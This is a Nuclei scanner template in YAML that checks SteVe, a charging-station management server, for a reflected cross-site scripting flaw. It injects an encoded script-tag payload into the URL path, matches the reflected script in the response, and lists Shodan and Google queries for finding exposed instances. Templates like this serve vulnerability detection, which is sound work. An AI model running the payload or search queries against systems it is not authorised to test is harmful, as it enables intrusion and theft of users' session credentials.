48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
id: steve-xss
|
|
|
|
info:
|
|
name: SteVe - Cross-Site Scripting
|
|
author: clem9669
|
|
severity: medium
|
|
description: |
|
|
SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://github.com/steve-community/steve
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cwe-id: CWE-80
|
|
cpe: cpe:2.3:a:steve-community:steve:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: http.title:"SteVe - Steckdosenverwaltung"
|
|
google-query: intitle:"SteVe - Steckdosenverwaltung"
|
|
product: steve
|
|
vendor: steve-community
|
|
tags: steve,xss,oss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
|
|
- '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script>/services/?stylesheet=1">'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100998533d2c718c5ad64c1dd87dcddb15a37c6acc6a6ee1d297d69619224be0c01022100f3075a9bc222a2df70b4ae984d3a89cd916fbca8b2a3e143d868a32306d439fc:922c64590222798bb761d5b6d8e72950 |